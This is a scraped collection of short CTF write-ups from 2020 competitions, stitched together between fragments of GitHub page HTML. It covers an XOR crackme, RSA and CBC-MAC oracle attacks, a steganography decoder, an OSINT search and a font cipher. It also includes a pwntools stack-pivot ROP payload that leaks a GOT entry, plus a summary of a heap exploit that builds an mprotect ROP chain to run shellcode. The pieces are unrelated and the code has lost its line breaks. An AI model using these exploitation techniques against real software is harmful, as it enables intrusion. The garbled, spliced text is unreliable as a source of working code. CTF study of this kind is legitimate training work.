<nav aria-label='footer' class="col-12 col-lg-8"> <h3 class='sr-only' id='sr-footer-heading'>Footer navigation</h3> Terms Privacy Security Status Docs Contact GitHub Pricing API Training Blog About </nav> </div>
<div class="d-flex flex-justify-center pb-6"> <span></span> </div></footer>
<div id="ajax-error-message" class="ajax-error-message flash flash-error" hidden> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-alert"> <path d="M6.457 1.047c.659-1.234 2.427-1.234 3.086 0l6.082 11.378A1.75 1.75 0 0 1 14.082 15H1.918a1.75 1.75 0 0 1-1.543-2.575Zm1.763.707a.25.25 0 0 0-.44 0L1.698 13.132a.25.25 0 0 0 .22.368h12.164a.25.25 0 0 0 .22-.368Zm.53 3.996v2.5a.75.75 0 0 1-1.5 0v-2.5a.75.75 0 0 1 1.5 0ZM9 11a1 1 0 1 1-2 0 1 1 0 0 1 2 0Z"></path></svg> <button type="button" class="flash-close js-ajax-error-dismiss" aria-label="Dismiss error"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path d="M3.72 3.72a.75.75 0 0 1 1.06 0L8 6.94l3.22-3.22a.749.749 0 0 1 1.275.326.749.749 0 0 1-.215.734L9.06 8l3.22 3.22a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215L8 9.06l-3.22 3.22a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042L6.94 8 3.72 4.78a.75.75 0 0 1 0-1.06Z"></path></svg> </button> You can’t perform that action at this time. </div>
<div class="js-stale-session-flash flash flash-warn flash-banner" hidden > <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-alert"> <path d="M6.457 1.047c.659-1.234 2.427-1.234 3.086 0l6.082 11.378A1.75 1.75 0 0 1 14.082 15H1.918a1.75 1.75 0 0 1-1.543-2.575Zm1.763.707a.25.25 0 0 0-.44 0L1.698 13.132a.25.25 0 0 0 .22.368h12.164a.25.25 0 0 0 .22-.368Zm.53 3.996v2.5a.75.75 0 0 1-1.5 0v-2.5a.75.75 0 0 1 1.5 0ZM9 11a1 1 0 1 1-2 0 1 1 0 0 1 2 0Z"></path></svg> <span>You signed in with another tab or window. Reload to refresh your session.</span> <span>You signed out in another tab or window. Reload to refresh your session.</span> </div> <template id="site-details-dialog"> <details class="details-reset details-overlay details-overlay-dark lh-default color-fg-default hx_rsm" open> <summary role="button" aria-label="Close dialog"></summary> <details-dialog class="Box Box--overlay d-flex flex-column anim-fade-in fast hx_rsm-dialog hx_rsm-modal"> <button class="Box-btn-octicon m-0 btn-octicon position-absolute right-0 top-0" type="button" aria-label="Close dialog" data-close-dialog> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path d="M3.72 3.72a.75.75 0 0 1 1.06 0L8 6.94l3.22-3.22a.749.749 0 0 1 1.275.326.749.749 0 0 1-.215.734L9.06 8l3.22 3.22a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215L8 9.06l-3.22 3.22a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042L6.94 8 3.72 4.78a.75.75 0 0 1 0-1.06Z"></path></svg> </button> <div class="octocat-spinner my-6 js-details-dialog-spinner"></div> </details-dialog> </details></template>
<div class="Popover js-hovercard-content position-absolute" style="display: none; outline: none;" tabindex="0"> <div class="Popover-message Popover-message--bottom-left Popover-message--large Box color-shadow-large" style="width:360px;"> </div></div>
<template id="snippet-clipboard-copy-button"> <div class="zeroclipboard-container position-absolute right-0 top-0"> <clipboard-copy aria-label="Copy" class="ClipboardButton btn js-clipboard-copy m-2 p-0 tooltipped-no-delay" data-copy-feedback="Copied!" data-tooltip-direction="w"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-copy js-clipboard-copy-icon m-2"> <path d="M0 6.75C0 5.784.784 5 1.75 5h1.5a.75.75 0 0 1 0 1.5h-1.5a.25.25 0 0 0-.25.25v7.5c0 .138.112.25.25.25h7.5a.25.25 0 0 0 .25-.25v-1.5a.75.75 0 0 1 1.5 0v1.5A1.75 1.75 0 0 1 9.25 16h-7.5A1.75 1.75 0 0 1 0 14.25Z"></path><path d="M5 1.75C5 .784 5.784 0 6.75 0h7.5C15.216 0 16 .784 16 1.75v7.5A1.75 1.75 0 0 1 14.25 11h-7.5A1.75 1.75 0 0 1 5 9.25Zm1.75-.25a.25.25 0 0 0-.25.25v7.5c0 .138.112.25.25.25h7.5a.25.25 0 0 0 .25-.25v-7.5a.25.25 0 0 0-.25-.25Z"></path></svg> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-check js-clipboard-check-icon color-fg-success d-none m-2"> <path d="M13.78 4.22a.75.75 0 0 1 0 1.06l-7.25 7.25a.75.75 0 0 1-1.06 0L2.22 9.28a.751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018L6 10.94l6.72-6.72a.75.75 0 0 1 1.06 0Z"></path></svg> </clipboard-copy> </div></template>
</div>
<div id="js-global-screen-reader-notice" class="sr-only" aria-live="polite" ></div> </body></html>
|
```import string
# the result is compared with the following string# found in memory with gdbstrz=list("adhmp`badO|sL}JuvvFmiui{@IO}QQVRZ")
solution = []
# is a stream chiper, and every char is xored with a counter starting from 7for index, y in enumerate(strz): solution.append( chr(ord(y) ^ (7 + index)) )
print("".join(solution))
``` |
TLDR;- RSA encryption/decryption oracle- The oracle gives the flag ciphertext and the public modulus- Just ask for the decryption of `c+n` where `c` is the flag ciphertext and `n` is the public modulus- Note: The server expects and sends all values as bytes with little endian ordering
[writeup](https://jsur.in/posts/2020-04-13-dawgctf-2020-writeups#cha-cha-real-smooth) |
Pivot through all the different memory regions (program base, heap, stack, libc, ld) based on only one libc leak from the heap. Read the flag file by carefully building a mprotect ROP chain with the 8 byte write-what-where to make the heap executable and run shellcode that follows seccomp rules. |
[Writeup](https://github.com/eWorkaholics/DawgCTF-2020/blob/master/DawgCTF%20Writeup.pdf).
**Solve script** (PowerShell):```$csvFiles = gci "$PSScriptRoot/Benford_s_Law_Firm_LLC"
#loop through csv filesforeach ($csv in $csvFiles.Name) { # get dollar value of from csv $data = (gc "$PSScriptRoot/Benford_s_Law_Firm_LLC/$csv").split(',') | Where { $_ -match '\d' } #loop through dollar values and count how many start with a 1 $count1 = 0 $data | foreach { if ($_.StartsWith('$1')) { $count1++ } } #check if count of 1s does not follow Benford's Law if ($count1/$data.count -gt .60 -or $count1/$data.count -lt .10) { "$csv 1 anomoly: $($count1/$data.count)" }
}``` |
satck pivot first, then use gadget `leave;ret` to entry ropchain
```# stack pivotpayload = cyclic(12)payload+= p32(ebp) # ebppayload+= p32(0x080496d1) # return addresspayload+= p32(0xdeadbeef) # paddingru('So where we roppin boys?\n')se(payload)
# rop1ropchain = p32(elf.sym['puts'])+p32(elf.sym['main'])+p32(elf.got['puts'])pl2 = ropchainpl2+= p32(ebp-0xc-4) # ebppl2+= p32(leave) # return addresspl2+= p32(0xdeadbeef) # paddingse(pl2)```
[more details](http://taqini.space/2020/04/13/DawgCTF-2020-Pwn-rop-Writeup/) |
# PIL[Full (Combined) Writeup Here](https://gist.github.com/ThePuzzlemaker/4f3657489d8e8dad69652ad1de2b9dff)
## Description
Our team detected a suspicious image, and managed to get a code of some sort, and we think they are related.
Can you investigate this subject and see if you can give us more data?
## Hint
PIL = PI + IL
## Solution
Some ILCode is provided as well as a bitmap.

`source` (provided):```.class private auto ansi '<Module>'{} // end of class <Module>
.class private auto ansi beforefieldinit csharp.Program extends [mscorlib]System.Object{ // Fields .field private static class [mscorlib]System.IO.FileStream piFile
// Methods .method private hidebysig static void Main ( string[] args ) cil managed { // Method begins at RVA 0x2050 // Code size 38 (0x26) .maxstack 8
IL_0000: ldstr "one-million-digits.txt" IL_0005: ldc.i4.3 IL_0006: ldc.i4.1 IL_0007: newobj instance void [mscorlib]System.IO.FileStream::.ctor(string, valuetype [mscorlib]System.IO.FileMode, valuetype [mscorlib]System.IO.FileAccess) IL_000c: stsfld class [mscorlib]System.IO.FileStream csharp.Program::piFile IL_0011: ldstr "original.bmp" IL_0016: ldstr "result.bmp" IL_001b: ldstr "<CENSORED>" IL_0020: call void csharp.Program::Hide(string, string, string) IL_0025: ret } // end of method Program::Main
.method private hidebysig static void Hide ( string srcPath, string dstPath, string secret ) cil managed { // Method begins at RVA 0x2078 // Code size 106 (0x6a) .maxstack 5 .locals init ( [0] class [mscorlib]System.Collections.BitArray, [1] uint8[], [2] int32, [3] int32, [4] uint8, [5] int32 )
IL_0000: call class [mscorlib]System.Text.Encoding [mscorlib]System.Text.Encoding::get_UTF8() IL_0005: ldarg.2 IL_0006: callvirt instance uint8[] [mscorlib]System.Text.Encoding::GetBytes(string) IL_000b: newobj instance void [mscorlib]System.Collections.BitArray::.ctor(uint8[]) IL_0010: stloc.0 IL_0011: ldarg.0 IL_0012: call uint8[] [mscorlib]System.IO.File::ReadAllBytes(string) IL_0017: stloc.1 IL_0018: ldloc.1 IL_0019: ldc.i4.s 14 IL_001b: ldelem.u1 IL_001c: ldc.i4.s 14 IL_001e: add IL_001f: stloc.2 IL_0020: ldc.i4.0 IL_0021: stloc.s 5 // sequence point: hidden IL_0023: br.s IL_0058 // loop start (head: IL_0058) IL_0025: ldloc.2 IL_0026: call int32 csharp.Program::GetNextPiDigit() IL_002b: add IL_002c: stloc.3 IL_002d: ldc.i4 254 IL_0032: ldloc.1 IL_0033: ldloc.3 IL_0034: ldelem.u1 IL_0035: and IL_0036: conv.u1 IL_0037: stloc.s 4 IL_0039: ldloc.1 IL_003a: ldloc.3 IL_003b: ldloc.s 4 IL_003d: ldloc.0 IL_003e: ldloc.s 5 IL_0040: callvirt instance bool [mscorlib]System.Collections.BitArray::get_Item(int32) IL_0045: call uint8 [mscorlib]System.Convert::ToByte(bool) IL_004a: add IL_004b: conv.u1 IL_004c: stelem.i1 IL_004d: ldloc.2 IL_004e: ldc.i4.s 10 IL_0050: add IL_0051: stloc.2 IL_0052: ldloc.s 5 IL_0054: ldc.i4.1 IL_0055: add IL_0056: stloc.s 5
IL_0058: ldloc.s 5 IL_005a: ldloc.0 IL_005b: callvirt instance int32 [mscorlib]System.Collections.BitArray::get_Length() IL_0060: blt.s IL_0025 // end loop
IL_0062: ldarg.1 IL_0063: ldloc.1 IL_0064: call void [mscorlib]System.IO.File::WriteAllBytes(string, uint8[]) IL_0069: ret } // end of method Program::Hide
.method private hidebysig static int32 GetNextPiDigit () cil managed { // Method begins at RVA 0x20f0 // Code size 32 (0x20) .maxstack 2 .locals init ( [0] int32 )
IL_0000: ldsfld class [mscorlib]System.IO.FileStream csharp.Program::piFile IL_0005: callvirt instance int32 [mscorlib]System.IO.Stream::ReadByte() IL_000a: stloc.0 IL_000b: ldloc.0 IL_000c: ldc.i4.s 10 IL_000e: bne.un.s IL_001b
IL_0010: ldsfld class [mscorlib]System.IO.FileStream csharp.Program::piFile IL_0015: callvirt instance int32 [mscorlib]System.IO.Stream::ReadByte() IL_001a: stloc.0
IL_001b: ldloc.0 IL_001c: ldc.i4.s 48 IL_001e: sub IL_001f: ret } // end of method Program::GetNextPiDigit
.method public hidebysig specialname rtspecialname instance void .ctor () cil managed { // Method begins at RVA 0x211c // Code size 7 (0x7) .maxstack 8
IL_0000: ldarg.0 IL_0001: call instance void [mscorlib]System.Object::.ctor() IL_0006: ret } // end of method Program::.ctor
} // end of class csharp.Program```
Now, you see, I'm terrible at ILCode, so I compiled it to a DLL:`ilasm /output:test.dll /dll /debug source`Then I used ILSpy (the cross-platform command-line version since I'm using Linux):`ilspycmd test.dll > source.cs`
The source I got:```csharpusing System;using System.Collections;using System.IO;using System.Text;
namespace csharp{ internal class Program { private static FileStream piFile;
private static void Main(string[] args) { piFile = new FileStream("one-million-digits.txt", FileMode.Open, FileAccess.Read); Hide("original.bmp", "result.bmp", "<CENSORED>"); }
private static void Hide(string srcPath, string dstPath, string secret) { BitArray bitArray = new BitArray(Encoding.UTF8.GetBytes(secret)); byte[] array = File.ReadAllBytes(srcPath); int num = array[14] + 14; for (int i = 0; i < bitArray.Length; i++) { int num2 = num + GetNextPiDigit(); byte b = (byte)(0xFE & array[num2]); array[num2] = (byte)(b + Convert.ToByte(bitArray[i])); num += 10; } File.WriteAllBytes(dstPath, array); }
private static int GetNextPiDigit() { int num = piFile.ReadByte(); if (num == 10) { num = piFile.ReadByte(); } return num - 48; } }}```
The million digits of Pi start **after** the decimal point (e.g. `14159265...`). This was found out by asking the admins. Thanks admins, you're doing great!
The algorithm works like this (pseudocode):```Initial conditions:* bitmap = OpenTheFile("original.bmp").ExtractItsBytesIntoAnArray(); // we aren't provided the original, but it's required to encode* flag = ExtractBitsFrom("<INSERT FLAG HERE>");* num = bitmap[14] + 14;Algorithm:* for every bitIndex in the flag, * num2 = num + GetNextPiDigit(); * b = ClearLastBit(bitmap[num2]); * bitmap[num2] = b + GetBitAsZeroOrOne(flag[i]); * num = num + 10;End of loop:* OpenTheFile("result.bmp").WriteBytes(bitmap);```To decode this, you simply have to go use the same loop but replace these two instructions:`b = ClearLastBit(bitmap[num2]);``bitmap[num2] = b + GetBitAsZeroOrOne(flag[i]);`with some type of logic to set a bit in a character to 0 or 1.
Here's the script that I used for this:(I had to use Python 2 cause it was complaining about non-UTF8 characters in `result.bmp`)```python
with open("result.bmp", "r") as file: bmp = file.read()
with open("pi.txt", "r") as file: pi = file.read()
def getPi(): global cpi cpi += 1 return int(pi[cpi-1])
cpi = 0
num = ord(bmp[14]) + 14
flagLst = ("a "*64).split(" ")
charNum = 0
for i in range(0, 64): # Going to 64 characters cause I don't know the length of the flag for i2 in range(0, 8): pin = getPi() num2 = num + pin charNum |= (0x01 & ord(bmp[num2])) << i2 # print("num : %d / pi : %d / num2 : %d / charNum : %s" % (num, pin, num2, bin(charNum))) # debugging num += 10 # print(chr(charNum)) # debugging flagLst[i] = chr(charNum) charNum = 0
flag = "".join(flagLst)print(flag)```
Running this script got me:
```hexCTF{l00k_wh0_l3arned_t0_sp34k_byt3c0de}F��c��u�Ѡ�Y��P,8/```
That extra gibberish at the end is non-encoded characters, so you can just ignore that.
Extracting that first bit gets you the flag.
### Non-Provided References
`pi.txt` is simply a truncated (remove the first two characters, `3.`) version of [pi1000000.txt](https://www.angio.net/pi/digits/pi1000000.txt) from [angio.net](https://www.angio.net/pi/digits.html). |
# Sign Me Up
```pythonfrom message import *
n, e = 20312493432722984634615913227523125265781662152013094377607630781356105942700273581600613724248110835803158659086732527322062709047441686884292861771528866639670389435647460159612029672461252955594829829663172687201461554413049025271464412190235617740846789840419025423396967519520427432799227162339126087426790939948330768088600429869826069490486741417370162186831426441346576810446894902659826134877586519596679449287778809427232767231366708775004671368581690484301650399106765403344734339945464967775820750215294237822308697430395972800155973323880641007064174229976873404987801414040860359400339131120435868680687, 65537
out = ''for l in c: for j in range(32, 127): if pow(j, e, n) == l: out += chr(j) breakprint(out)```
`auctf{D0nT_5igN_r4nd0m_Cr4P_w1tH_y0uR_pr1vAT3_k3y_d00d}` |
# Overview[Full (Combined) Writeup Here](https://gist.github.com/ThePuzzlemaker/4f3657489d8e8dad69652ad1de2b9dff)
This was my first time doing a CTF (and I was alone), and therefore it was a bit above my skill level, but with some help from the admins and authors of the challenges, it was an overall fun experience.
Thank you to (in no particular order):
The Hexion Team
Authors (with mentions of the challenges which I completed):* Idan (PIL, Nameless, Mirage, T&J)* Yarin (Well Known, Nameless, X0R)* moka (Hmmm)* MrPeck (sorry I didn't complete your challenges) |
TLDR;- CBC-MAC oracle gives exactly one plaintext message and its MAC- Have to verify any message to get the flag- The CBC-MAC of `(m1,m2,...,mN,CBC-MAC(m)^m1,m2,...,mN)` is the same as `CBC-MAC(m)`- Send this message with the original MAC that the server gave
[writeup](https://jsur.in/posts/2020-04-13-dawgctf-2020-writeups#criss-cross-criss-cross) |
# AUCTF 2020 – Who Made Me
* **Category:** OSINT* **Points:** 950
## Challenge
> One of the developers of this CTF worked really hard on this challenge.> > note: the answer is not the author's name> > Author: c
## Solution
The official Github profile of *Auburn University Ethical Hacking Club* is `https://github.com/auehc`.
One of the members is `https://github.com/vincentchu37` and he has an interesting repository: `https://github.com/vincentchu37/AUCTF-2020`.
That repository was created by `https://github.com/chharles`, the author of the challenge.
Analyzing the commits, one regarding the flag can be found (`https://github.com/chharles/AUCTF-2020/commit/23ba3a6fbc0ef5244af488c87022ad27a9d10e06`), but the reported flag is a false one (`soGJvcjTknXM`).

Looking further, the commit with the flag can be found (`https://github.com/chharles/AUCTF-2020/commit/56721948f12e3a76a5316c62ad2bcf47e8119926`).

The flag is the following.
```auctf{G1tHuB_4lwAY5_r3mEmB3r5_8923_1750921}``` |
# Mirage[Full (Combined) Writeup Here](https://gist.github.com/ThePuzzlemaker/4f3657489d8e8dad69652ad1de2b9dff)
## Description
"Your eyes can deceive you; don't trust them."-- Obi-Wan Kenobi
[https://mirage.hexionteam.com](https://mirage.hexionteam.com)

## Solution
The flag is encoded in a font (hexFont) that has some glyphs rearranged. Doing some simple deduction and replacement, you get: `hexCTF{Don7_judge_a_B0Ok_by_1ts_c0v3r}`
## Script
```pystrng = "j4teqybvAskIE2S}4IdIc_M5IB8IHmlIF_0Ypn"
alphabet = { "d": "a", "B": "b", "F": "c", "S": "d", "4": "e", "f": "f", "}": "g", "j": "h", "Z": "i", "E": "j", "5": "k", "g": "l", "R": "m", "s": "n", "A": "o", "K": "p", "O": "q", "p": "r", "l": "s", "m": "t", "2": "u", "0": "v", "x": "w", "t": "x", "8": "y", "h": "z", "w": "A", "c": "B", "e": "C", "v": "D", "o": "E", "y": "F", "G": "G", "z": "H", "1": "I", "T": "J", "J": "K", "{": "L", "V": "M", "D": "N", "M": "O", "Q": "P", "3": "Q", "9": "R", "i": "S", "q": "T", "u": "U", "C": "V", "7": "W", "W": "X", "X": "Y", "N": "Z", "_": "0", "H": "1", "L": "2", "Y": "3", "U": "4", "a": "5", "P": "6", "k": "7", "r": "8", "6": "9", "b": "{", "n": "}", "I": "_"}
newStr = ""
for c in strng: newStr = newStr + alphabet[c]
print(newStr)``` |
<html lang="en" data-color-mode="auto" data-light-theme="light" data-dark-theme="dark" data-a11y-animated-images="system"> <head> <meta charset="utf-8"> <link rel="dns-prefetch" href="https://github.githubassets.com"> <link rel="dns-prefetch" href="https://avatars.githubusercontent.com"> <link rel="dns-prefetch" href="https://github-cloud.s3.amazonaws.com"> <link rel="dns-prefetch" href="https://user-images.githubusercontent.com/"> <link rel="preconnect" href="https://github.githubassets.com" crossorigin> <link rel="preconnect" href="https://avatars.githubusercontent.com">
<link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/light-fe3f886b577a.css" /><link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/dark-a1dbeda2886c.css" /><link data-color-theme="dark_dimmed" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_dimmed-1ad5cf51dfeb.css" /><link data-color-theme="dark_high_contrast" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_high_contrast-11d3505dc06a.css" /><link data-color-theme="dark_colorblind" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_colorblind-8b800495504f.css" /><link data-color-theme="light_colorblind" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/light_colorblind-daa38c88b795.css" /><link data-color-theme="light_high_contrast" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/light_high_contrast-1b9ea565820a.css" /><link data-color-theme="light_tritanopia" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/light_tritanopia-e4be9332dd6c.css" /><link data-color-theme="dark_tritanopia" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_tritanopia-0dcf95848dd5.css" /> <link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/primer-c581c4e461bb.css" /> <link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/global-0e278d45156f.css" /> <link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/github-dcaf0f44dbb1.css" /> <link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/code-26709f54a08d.css" />
<script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/wp-runtime-774bfe5ae983.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_stacktrace-parser_dist_stack-trace-parser_esm_js-node_modules_github_bro-327bbf-0aaeb22dd2a5.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/ui_packages_soft-nav_soft-nav_ts-21fc7a4a0e8f.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/environment-e059fd03252f.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_selector-observer_dist_index_esm_js-2646a2c533e3.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_delegated-events_dist_index_js-node_modules_github_details-dialog-elemen-63debe-c04540d458d4.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_relative-time-element_dist_index_js-b9368a9cb79e.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_fzy_js_index_js-node_modules_github_markdown-toolbar-element_dist_index_js-e3de700a4c9d.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_auto-complete-element_dist_index_js-node_modules_github_catalyst_-6afc16-e779583c369f.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_file-attachment-element_dist_index_js-node_modules_github_text-ex-3415a8-7ecc10fb88d0.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_filter-input-element_dist_index_js-node_modules_github_remote-inp-79182d-befd2b2f5880.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_primer_view-components_app_components_primer_primer_js-node_modules_gith-6a1af4-df3bc95b06d3.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/github-elements-fc0e0b89822a.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/element-registry-1641411db24a.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_lit-html_lit-html_js-9d9fe1859ce5.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_manuelpuyol_turbo_dist_turbo_es2017-esm_js-4140d67f0cc2.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_mini-throttle_dist_index_js-node_modules_github_alive-client_dist-bf5aa2-424aa982deef.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_primer_behaviors_dist_esm_dimensions_js-node_modules_github_hotkey_dist_-9fc4f4-d434ddaf3207.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_color-convert_index_js-35b3ae68c408.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_remote-form_dist_index_js-node_modules_github_session-resume_dist-def857-2a32d97c93c5.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_paste-markdown_dist_index_esm_js-node_modules_github_quote-select-15ddcc-1512e06cfee0.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_updatable-content_ts-430cacb5f7df.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_behaviors_keyboard-shortcuts-helper_ts-app_assets_modules_github_be-f5afdb-8dd5f026c5b9.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_sticky-scroll-into-view_ts-0af96d15a250.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_behaviors_include-fragment_ts-app_assets_modules_github_behaviors_r-4077b4-75370d1c1705.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_behaviors_commenting_edit_ts-app_assets_modules_github_behaviors_ht-83c235-7883159efa9e.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/behaviors-742151da9690.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_delegated-events_dist_index_js-node_modules_github_catalyst_lib_index_js-06ff531-32d7d1e94817.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/notifications-global-f5b58d24780b.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_morphdom_dist_morphdom-esm_js-node_modules_github_template-parts_lib_index_js-58417dae193c.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_virtualized-list_es_index_js-node_modules_github_memoize_dist_esm_index_js-8496b7c4b809.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_remote-form_dist_index_js-node_modules_delegated-events_dist_inde-70450e-0370b887db62.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_ref-selector_ts-7bdefeb88a1a.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/codespaces-d1ede1f1114e.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_filter-input-element_dist_index_js-node_modules_github_mini-throt-a33094-b03defd3289b.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_file-attachment-element_dist_index_js-node_modules_github_mini-th-85225b-226fc85f9b72.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/repositories-8093725f8825.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/topic-suggestions-7a1f0da7430a.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/code-menu-89d93a449480.js"></script>
<title>ctf-writeups/Hack Zone Tunisia 2020/pwn/pwn2 at master · KEERRO/ctf-writeups · GitHub</title>
<meta name="route-pattern" content="/:user_id/:repository/tree/*name(/*path)">
<meta name="current-catalog-service-hash" content="343cff545437bc2b0304c97517abf17bb80d9887520078e9757df416551ef5d6">
<meta name="request-id" content="C166:380B:4306931:448923E:6412213E" data-pjax-transient="true"/><meta name="html-safe-nonce" content="07acddf943169798734c20438cf2550bfab0963223e95a91e9fc1cc330bcd5af" data-pjax-transient="true"/><meta name="visitor-payload" content="eyJyZWZlcnJlciI6IiIsInJlcXVlc3RfaWQiOiJDMTY2OjM4MEI6NDMwNjkzMTo0NDg5MjNFOjY0MTIyMTNFIiwidmlzaXRvcl9pZCI6IjE4MDU5MzA1NDU4Nzc3NTQxNzQiLCJyZWdpb25fZWRnZSI6ImZyYSIsInJlZ2lvbl9yZW5kZXIiOiJmcmEifQ==" data-pjax-transient="true"/><meta name="visitor-hmac" content="94aa614f612e8e7444be0aa8d1638d69b3c7a08865d8835af686934e2aebc052" data-pjax-transient="true"/>
<meta name="hovercard-subject-tag" content="repository:162845937" data-turbo-transient>
<meta name="github-keyboard-shortcuts" content="repository,source-code,file-tree" data-turbo-transient="true" />
<meta name="selected-link" value="repo_source" data-turbo-transient>
<meta name="google-site-verification" content="c1kuD-K2HIVF635lypcsWPoD4kilo5-jA_wBFyT4uMY"> <meta name="google-site-verification" content="KT5gs8h0wvaagLKAVWq8bbeNwnZZK1r1XQysX3xurLU"> <meta name="google-site-verification" content="ZzhVyEFwb7w3e0-uOTltm8Jsck2F5StVihD0exw2fsA"> <meta name="google-site-verification" content="GXs5KoUUkNCoaAZn7wPN-t01Pywp9M3sEjnt_3_ZWPc"> <meta name="google-site-verification" content="Apib7-x98H0j5cPqHWwSMm6dNU4GmODRoqxLiDzdx9I">
<meta name="octolytics-url" content="https://collector.github.com/github/collect" />
<meta name="analytics-location" content="/<user-name>/<repo-name>/files/disambiguate" data-turbo-transient="true" />
<meta name="user-login" content="">
